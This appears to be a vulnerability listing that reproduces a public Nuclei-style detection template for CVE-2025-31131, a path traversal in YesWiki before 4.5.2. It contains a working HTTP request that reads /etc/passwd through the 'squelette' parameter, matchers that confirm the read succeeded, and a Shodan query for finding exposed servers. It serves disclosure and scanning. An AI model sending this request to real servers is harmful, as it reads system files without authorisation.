漏洞描述
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
CVE-2025-31131: Yeswiki < 4.5.2 - Unauthenticated Path Traversal
PoC代码[已公开]
id: CVE-2025-31131
info:
name: Yeswiki < 4.5.2 - Unauthenticated Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
remediation: This vulnerability is fixed in 4.5.2.
reference:
- https://github.com/advisories/GHSA-w34w-fvp3-68xm
- https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989
- https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm
classification:
epss-score: 0.07857
epss-percentile: 0.91673
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2025-31131
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: html:"yeswiki"
tags: cve,cve2025,yeswiki,lfi
http:
- raw:
- |
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- YesWiki-main
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a004730450220376e962ed91a1ef14b2fe5bcf04fa800541b11f6602c930d144149d9726d3952022100b64978b88548e3f3f2dd58ab3ee1c8090bf5fd09c588112049747ee6cd56ad82:922c64590222798bb761d5b6d8e72950